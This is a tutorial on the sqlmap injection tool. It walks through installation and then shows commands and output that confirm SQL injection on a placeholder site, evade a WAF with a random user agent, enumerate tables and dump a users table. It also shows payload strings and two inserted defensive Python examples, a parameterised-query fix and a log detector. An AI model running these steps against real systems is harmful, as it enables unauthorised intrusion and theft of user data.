Running sqlmap yourself is not difficult. This tutorial will take you from noob to ninja with this powerful SQL injection testing tool.
Sqlmap is a Python-based tool, which means it will usually run on any system with Python. However, we like Linux, and specifically Ubuntu; it simply makes it easy to get stuff done. Python comes already installed in Ubuntu. This is the same tool we use on our online SQL injection test site.
To begin using sqlmap, simply download the tool, unpack it, and run the command with the necessary options.
For those of you using Windows, I'll begin by explaining how to set up an Ubuntu installation. Starting on an Ubuntu Linux system is straightforward, even for those apprehensive about Linux.
Install SQLmap
Step 1: Get a Linux based Operating System
If you are going to run SQLmap on Windows with Python, make sure you have Python installed, and skip down to the next step. Otherwise, get your Linux system fired up. Either install a Linux virtual machine (Ubuntu or Kali recommended) on Windows (VirtualBox / VMware / Parallels) or boot up your Linux desktop.
If you run Microsoft Windows as your main operating system, it is convenient and simple to run an install of Ubuntu Linux (or Kali Linux) in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools.
Step 2: SQLmap Installation
Python is pre-installed in Ubuntu, so all you need to do is clone the latest repository from git and start your testing.
elliot@evilcorp:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Cloning into 'sqlmap-dev'...
remote: Enumerating objects: 732, done.
remote: Counting objects: 100% (732/732), done.
remote: Compressing objects: 100% (483/483), done.
remote: Total 732 (delta 250), reused 488 (delta 236), pack-reused 0
Receiving objects: 100% (732/732), 7.07 MiB | 10.99 MiB/s, done.
Resolving deltas: 100% (250/250), done.
Change into the directory and run the python script to ensure all looks good.
elliot@evilcorp:~$ cd sqlmap-dev
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py
___
__H__
___ ___[']_____ ___ ___ {1.8.4.5#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

Usage: python3 sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
If you do not see something like the output above, make sure Python is working; try
python -V
to check the version and confirm that you are in the right location.
Help menu and options
To get a full list of the help and options available:
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -h
To show advanced help and options available:
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -hh
How to use SQLmap
SQLMap generally requires parameters to target specific parts of a web application where SQL injection vulnerabilities may exist. While it is possible to run SQLMap against a URL directly, it is often more effective to specify parameters to conduct accurate testing.
Below is a basic example of how to use SQLMap with a URL (-u) and a parameter. The id=5 in the URL is the parameter being tested for SQL injection.
Example: Simple HTTP GET based test
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'
The results show the different methods used against the parameter.
___
__H__
___ ___[']_____ ___ ___ {1.8.4.5#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:55:56

[12:55:56] [INFO] testing connection to the target URL
[12:55:57] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'id' is dynamic
[12:55:58] [INFO] confirming that GET parameter 'id' is dynamic
[12:55:59] [INFO] GET parameter 'id' is dynamic
[12:55:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:56:00] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hac")
[12:56:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:56:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:56:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:56:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:56:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:56:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:56:25] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:56:27] [INFO] testing 'MySQL inline queries'
[12:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:56:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:56:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:56:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:56:41] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[12:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:43] [INFO] target URL appears to have 3 columns in query
[12:56:46] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9561=9561

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:56:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[12:56:52] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite'

[*] shutting down at 12:56:52
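The first technique sqlmap confirmed above is boolean-based blind, using the payload id=1 AND 9561=9561. The added Python example below (not code from this page or from sqlmap) reproduces that oracle against an in-memory SQLite table standing in for page.php, beside the parameterised query that closes it; the products rows, the hypothetical lookup functions and the false-condition payload are constructed for illustration.

```python
import sqlite3

# Constructed stand-in for the tutorial's 'books' database; the rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "Hacking Exposed"), (5, "Nginx Cookbook")])
    return conn

def lookup_vulnerable(conn, id_param):
    """Hypothetical page.php behaviour: the raw ?id= value is concatenated into SQL."""
    sql = "SELECT name FROM products WHERE id=" + id_param
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterised(conn, id_param):
    """Hardened form: the value is bound, so any SQL inside it is treated as data."""
    sql = "SELECT name FROM products WHERE id=?"
    return [row[0] for row in conn.execute(sql, (id_param,))]

TRUE_PAYLOAD = "1 AND 9561=9561"    # the boolean-based payload sqlmap reported above
FALSE_PAYLOAD = "1 AND 9561=9562"   # constructed: same shape, but the condition is false

def boolean_blind_detectable(conn, lookup):
    """Mimic sqlmap's boolean-based blind check: the parameter is injectable when
    appending a true condition and a false condition yields different responses."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)

if __name__ == "__main__":
    for label, fn in (("concatenated", lookup_vulnerable),
                      ("parameterised", lookup_parameterised)):
        print(f"{label:13}: id=5 -> {fn(make_db(), '5')}, "
              f"blind oracle -> {boolean_blind_detectable(make_db(), fn)}")
```

With the concatenated query the two payloads return different result sets, which is exactly the difference sqlmap keys on (here reported as --string="hac"); with the bound parameter both return nothing, so there is no oracle to exploit.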
Getting blocked by the Web Application Firewall - WAF
Try using a different user agent than the default sqlmap one, with the --random-agent parameter.
elliot@evilcorp:~/sqlmap-dev$ python3 sqlmap.py -u "http://mytestsite.com/page.php?id=5" --random-agent
___
__H__
___ ___[,]_____ ___ ___ {1.8.4.5#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:04 /2024-03-01/
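A WAF that only matches the stock sqlmap User-Agent is defeated by --random-agent, so detection should key on the request itself. The following added Python example (not code from this page or from sqlmap) scans constructed nginx access-log lines for the request shapes seen in the run above; the IPs, timestamps and User-Agent strings are made up, and the log format is assumed to be nginx's default combined format.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx access-log lines (combined format); not traffic from the page's target.
# 1: stock sqlmap User-Agent carrying the boolean-based payload reported above
# 2: a browser User-Agent (the effect of --random-agent) carrying the time-based payload
# 3: an ordinary visitor
SAMPLE_LOG = """\
10.0.0.7 - - [01/Mar/2024:14:14:04 +0000] "GET /page.php?id=1%20AND%209561%3D9561 HTTP/1.1" 200 1532 "-" "sqlmap/1.8.4.5#dev (https://sqlmap.org)"
10.0.0.7 - - [01/Mar/2024:14:14:09 +0000] "GET /page.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"
10.0.0.8 - - [01/Mar/2024:14:15:00 +0000] "GET /page.php?id=5 HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/122.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shapes of the three techniques sqlmap confirmed above, matched on the URL-decoded request.
PAYLOAD_PATTERNS = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+=\d+\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}
# The User-Agent sqlmap sends unless --random-agent or --user-agent overrides it.
UA_PATTERN = re.compile(r"\bsqlmap/", re.I)

def classify(line):
    """Return (decoded_path, signals) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))
    signals = [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(path)]
    if UA_PATTERN.search(m.group("ua")):
        signals.append("default sqlmap User-Agent")
    return path, signals

def flag_suspicious(log_text):
    """List (decoded_path, signals) for every line that raised at least one signal."""
    hits = []
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.append(parsed)
    return hits

if __name__ == "__main__":
    for path, signals in flag_suspicious(SAMPLE_LOG):
        print(f"{path!r}: {', '.join(signals)}")
```

The second line carries no User-Agent signal at all and is still flagged, which is the point: payload-shape matching survives a randomised agent, while agent-string matching alone does not.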
Retrieve the Database Tables
SQLmap can be used to test and exploit SQL Injection, doing things such as extracting data from databases, updating tables, and even popping shells on remote hosts if all the ducks are in line.
Let's retrieve the tables from the database using the SQL Injection vulnerability we confirmed above. As you will see in the output below, we can continue testing against the target without having to retest the vulnerability. SQLmap uses information it knows about the site to further exploit the target database.
To retrieve data simply add the --tables parameter to the previous command.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' --tables
___
__H__
___ ___[']_____ ___ ___ {1.8.4.5#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:59:04
[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9561=9561
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6630 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x79434e597a45536f5a4c695273427857546c76554854574c4f5a534f587368725142615a54456256,0x716b767a71),NULL-- mIJj
---
[12:59:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
Database: books
[8 tables]
+---------------------------------------+
| author |
| shoppingcarts |
| categories |
| featured |
| guestbook |
| pictures |
| products |
| users |
+---------------------------------------+
Database: information_schema
[28 tables] == snipped ==
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
[12:59:21] [INFO] fetched data logged to text files under '/home/elliot/.sqlmap/output/mytestsite.com'
[*] shutting down at 12:59:21
Dump the data
To get data we simply extend our command. Adding -T users will focus in on the users table, where we might be able to get some credentials. Adding --dump will tell SQLmap to grab all the data from the users table: first the columns are enumerated, and then the data is dumped from those columns.
elliot@evilcorp:~/sqlmap-dev$ python sqlmap.py -u 'http://mytestsite.com/page.php?id=5' -T users --dump
___
__H__
___ ___[']_____ ___ ___ {1.8.4.5#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:04

[12:59:04] [INFO] resuming back-end DBMS 'mysql'
[12:59:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
--- SNIP ---
Database: books
Table: users
[1 entry]
+----------+----------------------------------+------+-------+---------+------------------------+-----------------+
| name     | cart                             | pass | user  | phone   | email                  | address         |
+----------+----------------------------------+------+-------+---------+------------------------+-----------------+
| Elliot   | 55207107sfefsff8e7f2fa5ef4fa00f6 | test | test  | 4563454 | [email protected]      |                 |
+----------+----------------------------------+------+-------+---------+------------------------+-----------------+

[13:08:36] [INFO] table 'users' dumped to CSV file '/home/fred/.sqlmap/output/mytestsite/dump/books/users.csv'
[13:08:36] [INFO] fetched data logged to text files under '/home/fred/.sqlmap/output/mytestsite'

[*] shutting down at 13:08:36
SQLmap Tips - Go ninja on your SQL Injection Testing
Verbose output
When testing for SQL Injection, it is often necessary to dig into the requests manually to determine problems with the test or to confirm or even further exploit a discovered injection. Being able to increase the verbosity of your SQLmap output will help with this testing.
By increasing the verbosity (the -v option) to 4 you can see the HTTP requests, with 5 you also see the HTTP response headers, and 6 will show the full HTTP response. Obviously, this can get super noisy, but sometimes you need to see exactly what is happening.
Got Database Credentials?
This handy tip allows you to connect to the database directly (the -d option takes a connection string) and dump data such as users, databases, or tables. The nice thing about this is you don't have to remember the SQL syntax for the database or have a client installed. SQLmap will do the heavy lifting, acting as a database client to dump data.
DB Connection strings:
MySQL, Oracle, Microsoft SQL Server, PostgreSQL
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
SQLite, Microsoft Access
DBMS://DATABASE_FILEPATH
Popping Shells and More
SQLmap has a large number of options, and is an amazing tool for becoming one with a database. Apart from popping shells on the target host, you can send requests through tor, find injections in page responses automatically, spider sites and, of course, perform HTTP POST based testing. These examples merely scratch the surface. Find more examples on the excellent github wiki page.